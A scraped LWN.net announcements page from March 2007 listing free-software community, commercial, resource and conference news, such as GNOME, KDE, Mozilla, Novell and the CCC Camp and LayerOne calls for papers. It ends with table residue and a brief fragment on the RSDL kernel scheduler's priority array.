Page editor: Forrest Cook Announcements Non-Commercial announcements Updating the GNOME contributors listWork is being done to update the GNOME contributors list. "Do you all remember that we list our contributors in About GNOME? The list of GNOME contributors is probably outdated: many people contributed a lot of stuff in recent years and are not there. It's a shame to not thank them, so we have to fix this! It would be really great if all maintainers could take 10 minutes and check that all of their main contributors are listed in there."
GNOME Foundation board meeting minutesFor those who are curious about decision making within the GNOME project: the minutes from the March 1 GNOME Foundation board are now available. "Luis had a meeting with James Vasile of the Software Freedom Law Center, as one of the GNOME Foundation legal representatives and sent minutes of the meeting to the board list. We are in the process of signing a client agreement with the SFLC. James and Luis discussed various issues on which we might consult with the SFLC, including trademark, code audits, and patent issues."
GNOME participates in the 2007 Summer of CodeThe GNOME project has announced its participation in the 2007 Google Summer of Code. "GNOME will participate in Summer of Code 2007. We've started to collect ideas of projects for students. If you can think of a project that would make a good SoC project, please add it to this page before March 13th."
GreatGamesExperiment.com launchedGarageGames.com, Inc. has announced the launch of GreatGamesExperiment.com, a social networking site which emphasizes gaming. "Getting games made is only half of the problem. Finding an audience once you have sweat out two or three years of development is extremely difficult," says Great Games Experiment creator Jeff Tunnell. "Getting a lot of 'eyeballs' to look at your game is important, and social networking sites are a method of allowing a community to create its own content and momentum."
Final KDE e.V. Quarterly Report of 2006 (KDE.News)KDE.News has announced the availability of the KDE e.V.fourth quarter report [PDF]. "It covers the board meeting in Darmstadt, the fate of the technical working group and the status of the SQO-OSS research project. As usual there are reports from the working groups, including business cards, a branding meeting, an active HCI group and 27,478 commits. New members and finances are also covered."
Mozilla Foundation Statement of DirectionMitchell Baker has posted an initial version of the Mozilla Foundation statement of direction, describing what the Foundation is trying to do. "The Mozilla Foundation seeks to effectuate these goals both by building broadly-used products that impact Internet development as a whole, and by empowering people to act in highly decentralized, experimental ways. The work of creating general consumer products that influence broad aspects of Internet development is currently handled through the Mozilla Corporation. The Foundation plans to increase its direct involvement in other activities which enable people to participate in the development and enjoyment of the Internet in a decentralized, self-directed manner."
Commercial announcements ACCESS Linux Platform Development Suite at EclipseConACCESS Systems Americas, Inc. has announced the demonstration of its ACCESS Linux Platform Development Suite at the EclipseCon 2007 conference. "ACCESS recently announced that the Product Development Kit (PDK) for ACCESS Linux Platform is now available to licensees. The Company has also launched their Early ACCESS Program for qualified third party developers interested in being first to market using the ACCESS Linux Platform Development Suite and Garnet(TM) VM Compatibility Kit."
Novell reports financial Results for first fiscal quarter of 2007Novell, Inc. has announced its first quarter financial results for 2007. "For the first fiscal quarter 2007, Novell reported net revenue of $230 million, compared to net revenue of $242 million for the first fiscal quarter 2006. The loss available to common stockholders from continuing operations in the first fiscal quarter 2007 was $20 million, or $0.06 loss per common share. This compares to income available to common stockholders from continuing operations of $4 million, or $0.01 per diluted common share, for the first fiscal quarter 2006."
TimeSys Introduces LinuxLink Subscriptions for AMCC 440EPxTimeSys has announced the availability of LinuxLink Subscriptions for AMCC 440EPx Processors. "The partnership between TimeSys and AMCC allows customers of AMCC's popular PowerPC-based processors to use LinuxLink to build an enterprise-ready custom Linux platform. In addition to the new support for the 440EPx, TimeSys offers LinuxLink subscriptions for many other AMCC processors, including the 405EP, 405GP, 405GPr, 440EP, 440GP, 440GX, 440SP and 440SPe."
TuxMobil Celebrates 10th Anniversary as Resource for Linux, Laptops, PDAs and Mobile PhonesTuxMobil is celebrating its 10th anniversary. "TuxMobil is the number one online resource providing information about Linux for laptops, PDAs, cellular phones and portable media players. In short, TuxMobil is all about Linux and portable devices. The name TuxMobil is a abridgement of the words Tux and "mobil." Tux is the well known name of the Linux mascot and "mobil" is a shortcut for mobile."
VMware announces VMware ACE 2 enterprise editionVMware, Inc. has announced the release of the public beta version of VMware ACE 2 enterprise edition. "VMware ACE is a breakthrough product that enables IT desktop managers to create a standard PC environment including operating system, data and applications, wrap it with IT policies to protect the contents, package it into a virtual machine and deploy it to any managed or unmanaged PC endpoint."
Resources An FSF paper on restriction-free hardwareThe Free Software Foundation has announced the publication of a paper entitled "The road to hardware free from restrictions; on how hardware companies can make the free software community happier. "Hardware vendors could support the community by providing access under a permissive license to all the low-level hardware documentation necessary to port a free BIOS to their systems, and ideally offer engineering support."
Calls for Presentations Chaos Communication Camp 2007 Call for ParticipationA call for participation has gone out for the chaos Communication Camp. "We ask you to participate in the third Chaos Communication Camp on August, 8th to 12th, 2007 near Berlin, Germany. The Chaos Communication Camp is organized by the Chaos Computer Club (CCC). It is an international, five-day open-air event for hackers and associated life-forms. The Camp features two conference tracks with interesting lectures. Workshops will take place in a central workshop area and in thematic "villages", organized by various groups." Submissions are due by May 15 with an overflow deadline of June 5.
LayerOne 2007 Call for Papers and Pre-RegistrationA call for papers and pre-registration announcement has gone out for LayerOne 2007, a security conference. The event takes place in Pasadena, CA on May 5-6, 2007, submissions are due by March 31. "Pre-registration is available from now until the end of April. The pre-registration cost is 80 dollars (US) and will get you into both days of the conference as well as the Saturday night entertainment. Tickets will be available at the door, but the cost will be 100.00 (US)."
Upcoming Events FSF announces details of its Annual MeetingThe Free Software Foundation will hold its annual associate member and activist meeting at MIT, Cambridge, MA on March 24, 2007. "Keynote speakers Richard Stallman (FSF president) and Eben Moglen (FSF director and legal counsel) will each address the "Year of the Upgrade" theme, looking at what issues will demand the free software movement's attention after the new version of the GNU General Public License (GPLv3) is released."
Samba eXPerience 2007Samba eXPerience 2007 will take place in Goettingen, Germany on April 23-25, 2007. "The organizers are happy to welcome Howard Chu (Chief Architect of OpenLDAP) as the keynote speaker. Talks from the WINE project and OpenChange show the link to other projects, a talk regarding Samba and GPLv3 reflects the current legal discussions - and of course developers, users and vendors cover the program with 25 talks in two days."
Events: March 15, 2007 to May 14, 2007The following event listing is taken from the LWN.net Calendar.
If your event does not appear here, please tell us about it.
Page editor: Forrest Cook
|
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
![[RSDL]](/images/ns/kernel/RSDL1.png)
Like many schedulers, the RSDL maintains a priority array, as is crudely
diagrammed to the left. At each level there is a list of processes
currently wanting to run at that priority; each process has a quota of time
it is allowed to execute at that priority. The processes at the highest
priority are given time slices, and the scheduler rotates through them
using a typical round-robin algorithm.
![[page distribution graphic]](http://www.skynet.ie/~mel/anti-frag/2007-02-28/page_type_distribution.jpg)